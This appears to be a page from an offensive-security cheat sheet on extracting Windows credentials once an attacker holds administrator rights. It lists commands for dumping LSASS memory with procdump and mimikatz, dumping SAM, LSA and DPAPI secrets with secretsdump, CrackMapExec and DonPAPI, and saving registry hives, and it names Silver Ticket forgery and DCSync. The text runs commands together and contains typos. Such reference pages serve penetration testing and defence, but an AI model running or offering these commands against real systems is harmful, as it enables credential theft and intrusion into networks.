Administrator account
Extract credentials from LSASS
procdump.exe --acepteula -ma lsass.exe lsass.dmpmimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"load kiwi
creds_allcme smb <ip-range> -u <user> -p <password> -M lsassylsassy -d <domain> -u <user> -p <password> <ip>Extract Credentials from SAM
secretsdump.py <domain>/<user>:<password>@<ip>cme smb <ip-range> -u <user> -p <password> --samhashdumpreg save HKLM\SAM <file>;
reg save HKLM\SECURITY <file>;
reg save HKLM\SYSTEN <file>;
secretsdump.py -sam SAM -system SYSTEM LOCALmimikatz "privilege::debug" "lsadump::sam" "exit"diskshadow list shadows allmklink /d c:\shadowcopy\\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy\Extract Credentials from LSA
cme smb <ip-range> -u <user> -p <password> --lsasecretsdump.py <domain>/<user>:<password>@<ip>secretsdump.py -security <security-file> -system <system-file> LOCALreg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'Extract dpapi
DonPAPI.py <domain>/<user>:<password>@<target>mimikatz.exe "sekurlsa::dpapi"secretsdump.py <domain>/<user>:<password>@<ip>Extract kerberos tickets
sekurlsa::ticketsSilver Tickets
Silver Ticket Forgery
DCSync
Search Password Files
Search Stored Password
Chrome
Token Manipulation
Account Operators Group Membership
Azure Admin Group Membership
Last updated